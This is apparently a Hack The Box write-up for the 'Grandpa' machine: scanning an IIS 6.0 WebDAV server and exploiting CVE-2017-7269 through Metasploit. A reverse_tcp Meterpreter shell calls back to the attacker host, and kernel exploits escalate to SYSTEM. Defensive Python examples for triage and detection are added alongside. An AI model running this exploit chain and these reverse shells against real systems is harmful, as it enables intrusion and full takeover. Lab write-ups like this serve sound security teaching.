HTB Grandpa

$nmap -T4 -sV -A -p- 10.10.10.14

Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-20 08:59 CEST
Nmap scan report for 10.10.10.14
Host is up (0.050s latency).
Not shown: 65534 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods: 
|_  Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan: 
|   Server Date: Mon, 20 Jul 2020 07:00:51 GMT
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
|   Server Type: Microsoft-IIS/6.0
|_  WebDAV type: Unknown
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 107.27 seconds

Open Ports:

  • 80/tcp open http Microsoft IIS httpd 6.0

This banner points at an old IIS release. According to https://es.wikipedia.org/wiki/Internet_Information_Services, IIS 6.0 is the version bundled with Windows Server 2003 (and Windows XP Professional x64 Edition), so we are most likely dealing with an end-of-life Windows Server 2003 host; the sysinfo output later (Windows 5.2 Build 3790, Service Pack 2) confirms it. Note that Windows Vista and Windows Server 2008 ship IIS 7.0, not 6.0.

$gobuster dir -u 10.10.10.14 -w /usr/share/wordlists/dirb/common.txt -e

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.14/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Expanded:       true
[+] Timeout:        10s
===============================================================
2020/07/20 09:16:42 Starting gobuster
===============================================================
http://10.10.10.14/_private (Status: 403)
http://10.10.10.14/_vti_bin (Status: 301)
http://10.10.10.14/_vti_cnf (Status: 403)
http://10.10.10.14/_vti_log (Status: 403)
http://10.10.10.14/_vti_pvt (Status: 403)
http://10.10.10.14/_vti_bin/shtml.dll (Status: 200)
http://10.10.10.14/_vti_bin/_vti_adm/admin.dll (Status: 200)
http://10.10.10.14/_vti_bin/_vti_aut/author.dll (Status: 200)
http://10.10.10.14/_vti_txt (Status: 403)
http://10.10.10.14/aspnet_client (Status: 403)
http://10.10.10.14/images (Status: 301)
http://10.10.10.14/Images (Status: 301)
===============================================================
2020/07/20 09:17:03 Finished
===============================================================

$nikto -h 10.10.10.14

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.14
+ Target Hostname:    10.10.10.14
+ Target Port:        80
+ Start Time:         2020-07-20 09:13:52 (GMT2)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/6.0
+ Retrieved microsoftofficewebserver header: 5.0_Pub
+ Retrieved x-powered-by header: ASP.NET
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'microsoftofficewebserver' found, with contents: 5.0_Pub
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-aspnet-version header: 1.1.4322
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Retrieved dasl header: <DAV:sql>
+ Retrieved dav header: 1, 2
+ Retrieved ms-author-via header: MS-FP/4.0,DAV
+ Uncommon header 'ms-author-via' found, with contents: MS-FP/4.0,DAV
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH 
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5647: HTTP method ('Allow' Header): 'MOVE' may allow clients to change file locations on the web server.
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH 
+ OSVDB-5646: HTTP method ('Public' Header): 'DELETE' may allow clients to remove files on the web server.
+ OSVDB-397: HTTP method ('Public' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5647: HTTP method ('Public' Header): 'MOVE' may allow clients to change file locations on the web server.
+ WebDAV enabled (SEARCH UNLOCK MKCOL PROPFIND LOCK PROPPATCH COPY listed as allowed)
+ OSVDB-13431: PROPFIND HTTP verb may show the server's internal IP address: http://10.10.10.14/
+ OSVDB-396: /_vti_bin/shtml.exe: Attackers may be able to crash FrontPage by requesting a DOS device, like shtml.exe/aux.htm -- a DoS was not attempted.
+ OSVDB-3233: /postinfo.html: Microsoft FrontPage default file found.
+ OSVDB-3233: /_vti_inf.html: FrontPage/SharePoint is installed and reveals its version number (check HTML source for more information).
+ OSVDB-3500: /_vti_bin/fpcount.exe: Frontpage counter CGI has been found. FP Server version 97 allows remote users to execute arbitrary system commands, though a vulnerability in this version could not be confirmed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1376. http://www.securityfocus.com/bid/2252.
+ OSVDB-67: /_vti_bin/shtml.dll/_vti_rpc: The anonymous FrontPage user is revealed through a crafted POST.
+ /_vti_bin/_vti_adm/admin.dll: FrontPage/SharePoint file found.
+ 8015 requests: 0 error(s) and 27 item(s) reported on remote host
+ End Time:           2020-07-20 09:20:54 (GMT2) (422 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
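The nmap http-webdav-scan and nikto output above is read by hand: IIS 6.0, WebDAV on, FrontPage extensions, and a list of "risky" verbs. The following added example (not code from the original write-up) does that triage programmatically from a raw OPTIONS response; the sample response is constructed from the headers nikto reported for 10.10.10.14, and the "hardened" control is invented to show the negative case. One caveat worth encoding: nikto warns on both the `Public` and the `Allow` header, but only `Allow` reflects the ACL on the URI actually tested, and on `/` this box does not allow PUT or DELETE at all.

```python
"""Triage of an IIS/WebDAV OPTIONS response, reproducing by hand what the
nmap http-webdav-scan and nikto output tells us.  Added example, not code
from the original write-up; the target response is constructed from the
headers nikto reported for 10.10.10.14."""
from typing import Dict, Set

WEBDAV_METHODS = {"PROPFIND", "PROPPATCH", "MKCOL", "COPY", "MOVE", "LOCK", "UNLOCK", "SEARCH"}
# Methods that let a client create, change or remove content on the server.
WRITE_METHODS = {"PUT", "DELETE", "MOVE", "COPY", "MKCOL", "PROPPATCH"}

# Constructed sample: the headers nikto retrieved from OPTIONS / on the target.
SAMPLE_OPTIONS_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Microsoft-IIS/6.0\r\n"
    "MicrosoftOfficeWebServer: 5.0_Pub\r\n"
    "X-Powered-By: ASP.NET\r\n"
    "X-AspNet-Version: 1.1.4322\r\n"
    "DASL: <DAV:sql>\r\n"
    "DAV: 1, 2\r\n"
    "MS-Author-Via: MS-FP/4.0,DAV\r\n"
    "Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, "
    "PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH\r\n"
    "Allow: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)

# Constructed control (assumption, not observed anywhere): a current IIS with
# the WebDAV module off, to show what a clean result looks like.
SAMPLE_HARDENED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Microsoft-IIS/10.0\r\n"
    "Allow: OPTIONS, TRACE, GET, HEAD, POST\r\n"
    "Public: OPTIONS, TRACE, GET, HEAD, POST\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)


def parse_headers(raw: str) -> Dict[str, str]:
    """Map lower-cased header names to their values; the status line is skipped."""
    head = raw.split("\r\n\r\n", 1)[0]
    headers: Dict[str, str] = {}
    for line in head.split("\r\n")[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return headers


def method_set(headers: Dict[str, str], name: str) -> Set[str]:
    """Turn a comma-separated Allow/Public header into a set of upper-case verbs."""
    return {m.strip().upper() for m in headers.get(name, "").split(",") if m.strip()}


def triage(raw: str) -> Dict[str, object]:
    """Summarise the exposure a single OPTIONS response reveals."""
    h = parse_headers(raw)
    server = h.get("server", "")
    allow = method_set(h, "allow")
    public = method_set(h, "public")
    iis6 = server.lower().startswith("microsoft-iis/6.0")
    # Either a DAV header or any WebDAV verb in Allow means the DAV module is on.
    webdav = "dav" in h or bool(allow & WEBDAV_METHODS)
    return {
        "server": server,
        "iis6": iis6,
        "webdav": webdav,
        # MS-Author-Via: MS-FP/... means FrontPage Server Extensions (the /_vti_* tree).
        "frontpage": "ms-fp" in h.get("ms-author-via", "").lower(),
        # Allow is what this URI permits; Public is what the server supports anywhere.
        # nikto warns on both, but only Allow tells you the ACL on the tested path.
        "write_allowed_here": sorted(allow & WRITE_METHODS),
        "write_advertised_only": sorted((public & WRITE_METHODS) - allow),
        # IIS 6.0 with the WebDAV module enabled is the precondition for CVE-2017-7269.
        "cve_2017_7269_candidate": iis6 and webdav,
    }


if __name__ == "__main__":
    for label, resp in (("target", SAMPLE_OPTIONS_RESPONSE), ("hardened", SAMPLE_HARDENED_RESPONSE)):
        print(label, triage(resp))
```

On the target response the function reports IIS 6.0, WebDAV and FrontPage present, COPY as the only write verb allowed on `/`, and PUT/DELETE/MOVE/MKCOL/PROPPATCH merely advertised in `Public`. That last bucket is worth testing on other paths (`/_vti_bin`, `/images`) before claiming an upload vector, because the per-directory ACL may differ from the root.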

IIS 6.0 with WebDAV enabled (PROPFIND is allowed, and the DAV header is present) is the precondition for CVE-2017-7269, a stack buffer overflow in the ScStoragePathFromUrl function of the WebDAV service (httpext.dll) that is triggered by an overlong If: header in a PROPFIND request. It was exploited in the wild as a zero-day before its public disclosure in March 2017.
Let's follow this path.

More information about this vulnerability can be found here:
https://blog.trendmicro.com/trendlabs-security-intelligence/iis-6-0-vulnerability-leads-code-execution/
https://www.cvedetails.com/cve/CVE-2017-7269/
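For the defensive side of the same bug, the added example below (not code from the original write-up or from the Metasploit module) flags exploitation attempts in captured HTTP requests. The trigger is a PROPFIND whose If: header carries oversized `<http://localhost/...>` tokens, so the check parses the request head and alerts on an If: header beyond a length threshold. The 1024-byte threshold is a heuristic chosen here, and both sample requests are constructed: the attack sample copies only the shape of the public exploit's header, with filler bytes instead of the real payload.

```python
"""Flag CVE-2017-7269 exploitation attempts in captured HTTP requests.  Added
example, not code from the original write-up or from the Metasploit module.
The overflow sits in ScStoragePathFromUrl (httpext.dll) and is reached when the
IIS 6.0 WebDAV module parses the If: header of a PROPFIND request; public
exploits carry <http://localhost/...> tokens well over a kilobyte long there.
IF_LEN_THRESHOLD is an assumption for this demo, as are the sample requests."""
import re
from typing import Dict, List, Optional, Tuple

IF_LEN_THRESHOLD = 1024   # assumption: genuine lock-token If: headers are far shorter
TOKEN_RE = re.compile(r"<([^>]*)>")

# Constructed: a legitimate WebDAV client presenting a lock token it holds.
BENIGN_REQUEST = (
    b"PROPFIND /images/ HTTP/1.1\r\n"
    b"Host: 10.10.10.14\r\n"
    b"Depth: 1\r\n"
    b"If: (<opaquelocktoken:e71d4fae-5dec-22d6-fea5-00a0c91e6be4>)\r\n"
    b"Content-Length: 0\r\n\r\n"
)

# Constructed: the shape of the public exploit's header (two oversized
# localhost tokens of non-ASCII bytes); filler, not the real overflow payload.
FILLER = b"\xe6\xbd\xa8" * 500
ATTACK_REQUEST = (
    b"PROPFIND / HTTP/1.1\r\n"
    b"Host: localhost\r\n"
    + b"If: <http://localhost/" + FILLER + b"> (Not <locktoken:write1>) "
    + b"<http://localhost/" + FILLER + b">\r\n"
    + b"Content-Length: 0\r\n\r\n"
)


def parse_request(raw: bytes) -> Tuple[str, str, Dict[str, str]]:
    """Return (method, target, headers) from a raw HTTP/1.x request head."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")  # byte-preserving decode
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method.upper(), target, headers


def check_request(raw: bytes) -> Optional[str]:
    """Return an alert string for a suspicious PROPFIND, or None when it looks normal."""
    method, target, h = parse_request(raw)
    if method != "PROPFIND" or "if" not in h:
        return None
    if_hdr = h["if"]
    tokens = TOKEN_RE.findall(if_hdr)
    longest = max((len(t) for t in tokens), default=0)
    non_ascii = any(ord(c) > 127 for c in if_hdr)
    # Alert on the whole header or on any single <...> token being oversized.
    if len(if_hdr) > IF_LEN_THRESHOLD or longest > IF_LEN_THRESHOLD // 2:
        detail = f"{len(tokens)} tokens, longest {longest}"
        if non_ascii:
            detail += ", non-ASCII bytes"
        return (f"possible CVE-2017-7269 attempt: PROPFIND {target} with a "
                f"{len(if_hdr)}-byte If: header ({detail})")
    return None


def scan(requests: List[bytes]) -> List[str]:
    """Run check_request over a batch of captured requests and keep the alerts."""
    return [alert for alert in (check_request(r) for r in requests) if alert]


if __name__ == "__main__":
    for alert in scan([BENIGN_REQUEST, ATTACK_REQUEST]):
        print(alert)
```

This has to run on captured requests (IDS, WAF or reverse proxy), not on the IIS W3C logs, which do not record the If: header. A related indicator visible even without header capture is the burst of PROPFIND requests the Metasploit module produces while it brute-forces the physical path length.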

Metasploit has a module for this vulnerability. It needs the length of the web root's physical path on disk, which it brute-forces between MINPATHLENGTH and MAXPATHLENGTH; the defaults (3 to 60) are enough for a standard C:\Inetpub\wwwroot.

msf5 > search ScStoragePathFromUrl

Matching Modules
================

   #  Name                                                 Disclosure Date  Rank    Check  Description
   -  ----                                                 ---------------  ----    -----  -----------
   0  exploit/windows/iis/iis_webdav_scstoragepathfromurl  2017-03-26       manual  Yes    Microsoft IIS WebDav ScStoragePathFromUrl Overflow

msf5 > use 0

[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp

msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > options

Module options (exploit/windows/iis/iis_webdav_scstoragepathfromurl):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   MAXPATHLENGTH  60               yes       End of physical path brute force
   MINPATHLENGTH  3                yes       Start of physical path brute force
   Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          80               yes       The target port (TCP)
   SSL            false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI      /                yes       Path of IIS 6 web application
   VHOST                           no        HTTP server virtual host

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.10.131   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Microsoft Windows Server 2003 R2 SP2 x86

msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > 

msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set rhosts 10.10.10.14
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set lhost 10.10.14.8
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run

[*] Started reverse TCP handler on 10.10.14.8:4444 
[*] Trying path length 3 to 60 ...
[*] Sending stage (176195 bytes) to 10.10.10.14
[*] Meterpreter session 1 opened (10.10.14.8:4444 -> 10.10.10.14:1031) at 2020-07-20 10:04:28 +0200

meterpreter >

meterpreter > getuid

[-] stdapi_sys_config_getuid: Operation failed: Access is denied.

meterpreter > sysinfo 

Computer        : GRANPA
OS              : Windows .NET Server (5.2 Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Domain          : HTB
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > 

meterpreter > shell

[-] Failed to spawn shell with thread impersonation. Retrying without it.
Process 2992 created.
Channel 4 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

c:\Documents and Settings>

c:\Documents and Settings>whoami

whoami
nt authority\network service

c:\Documents and Settings>

meterpreter > run post/multi/recon/local_exploit_suggester

[*] 10.10.14.8 - Collecting local exploits for x86/windows...
[*] 10.10.14.8 - 34 exploit checks are being tried...
nil versions are discouraged and will be deprecated in Rubygems 4
[+] 10.10.14.8 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.14.8 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.14.8 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.14.8 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.14.8 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.14.8 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
meterpreter >

Let's first try the targets that appear to be vulnerable:

meterpreter > background

[*] Backgrounding session 1...

msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use exploit/windows/local/ms14_058_track_popup_menu

[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp

msf5 exploit(windows/local/ms14_058_track_popup_menu) > options

Module options (exploit/windows/local/ms14_058_track_popup_menu):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.94.129   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows x86

msf5 exploit(windows/local/ms14_058_track_popup_menu) > set session 1

session => 1

msf5 exploit(windows/local/ms14_058_track_popup_menu) > set lhost 10.10.14.8

lhost => 10.10.14.8

msf5 exploit(windows/local/ms14_058_track_popup_menu) > run

[*] Started reverse TCP handler on 10.10.14.8:4444 
[-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_config_getsid: Operation failed: Access is denied.
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/ms14_058_track_popup_menu) > 

msf5 exploit(windows/local/ms14_058_track_popup_menu) > use exploit/windows/local/ms14_070_tcpip_ioctl

[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp

msf5 exploit(windows/local/ms14_070_tcpip_ioctl) > options

Module options (exploit/windows/local/ms14_070_tcpip_ioctl):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.94.129   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows Server 2003 SP2

msf5 exploit(windows/local/ms14_070_tcpip_ioctl) > set session 1
msf5 exploit(windows/local/ms14_070_tcpip_ioctl) > set lhost 10.10.14.8
msf5 exploit(windows/local/ms14_070_tcpip_ioctl) > run

[*] Started reverse TCP handler on 10.10.14.8:4444 
[-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_config_getsid: Operation failed: Access is denied.
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/ms14_070_tcpip_ioctl) > 

msf5 exploit(windows/local/ms14_070_tcpip_ioctl) > sessions 1

[*] Starting interaction with 1...

meterpreter > 

meterpreter > getpid

Current pid: 3712

meterpreter > ps

Process List
============

 PID   PPID  Name               Arch  Session  User                          Path
 ---   ----  ----               ----  -------  ----                          ----
 0     0     [System Process]                                                
 4     0     System                                                          
 228   1076  cidaemon.exe                                                    
 272   4     smss.exe                                                        
 324   272   csrss.exe                                                       
 328   1076  cidaemon.exe                                                    
 348   272   winlogon.exe                                                    
 396   348   services.exe                                                    
 408   348   lsass.exe                                                       
 588   396   svchost.exe                                                     
 664   1076  cidaemon.exe                                                    
 676   396   svchost.exe                                                     
 736   396   svchost.exe                                                     
 764   396   svchost.exe                                                     
 800   396   svchost.exe                                                     
 936   396   spoolsv.exe                                                     
 964   396   msdtc.exe                                                       
 1076  396   cisvc.exe                                                       
 1120  396   svchost.exe                                                     
 1180  396   inetinfo.exe                                                    
 1216  396   svchost.exe                                                     
 1328  396   VGAuthService.exe                                               
 1408  396   vmtoolsd.exe                                                    
 1456  396   svchost.exe                                                     
 1632  396   alg.exe                                                         
 1652  396   svchost.exe                                                     
 1828  588   wmiprvse.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\wbem\wmiprvse.exe
 1912  396   dllhost.exe                                                     
 2304  588   wmiprvse.exe                                                    
 2344  348   logon.scr                                                       
 2756  1456  w3wp.exe           x86   0        NT AUTHORITY\NETWORK SERVICE  c:\windows\system32\inetsrv\w3wp.exe
 2824  588   davcdata.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\inetsrv\davcdata.exe
 2972  3712  cmd.exe            x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\cmd.exe
 3712  2756  rundll32.exe       x86   0                                      C:\WINDOWS\system32\rundll32.exe

meterpreter > 

Our session lives in rundll32.exe (PID 3712), spawned by the IIS worker w3wp.exe (PID 2756). Meterpreter cannot read that process's token: the User column is empty for it, and getuid and stdapi_sys_config_getsid fail with "Access is denied", which is why both local exploits abort before they even trigger. The cmd.exe we spawned from it (PID 2972) and whoami show that we really are NT AUTHORITY\NETWORK SERVICE, so we should migrate into another process owned by that account whose token Meterpreter can read.

Let's migrate to PID 1828 (wmiprvse.exe, running as NT AUTHORITY\NETWORK SERVICE).

meterpreter > migrate 1828

[*] Migrating from 3712 to 1828...
[*] Migration completed successfully.
meterpreter >

Let's run the ms14_070_tcpip_ioctl module again against the migrated session.

msf5 exploit(windows/local/ms14_070_tcpip_ioctl) > run

[*] Started reverse TCP handler on 10.10.14.8:4444 
[*] Storing the shellcode in memory...
[*] Triggering the vulnerability...
[*] Checking privileges after exploitation...
[+] Exploitation successful!
[*] Sending stage (176195 bytes) to 10.10.10.14
[*] Meterpreter session 2 opened (10.10.14.8:4444 -> 10.10.10.14:1031) at 2020-07-22 19:11:50 +0200

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM
meterpreter > 

meterpreter > ls

Listing: C:\Documents and Settings
==================================

Mode             Size  Type  Last modified              Name
----             ----  ----  -------------              ----
40777/rwxrwxrwx  0     dir   2017-04-12 16:12:15 +0200  Administrator
40777/rwxrwxrwx  0     dir   2017-04-12 15:42:38 +0200  All Users
40777/rwxrwxrwx  0     dir   2017-04-12 15:42:38 +0200  Default User
40777/rwxrwxrwx  0     dir   2017-04-12 16:32:01 +0200  Harry
40777/rwxrwxrwx  0     dir   2017-04-12 16:08:32 +0200  LocalService
40777/rwxrwxrwx  0     dir   2017-04-12 16:08:31 +0200  NetworkService

meterpreter > cd Harry 
meterpreter > cd Desktop
meterpreter > cat user.txt 

bdffXXXXXXXXXXXXXXXXXXXXXXXXXXXX

meterpreter > cd Administrator/Desktop
meterpreter > cat root.txt

9359XXXXXXXXXXXXXXXXXXXXXXXXXXXX
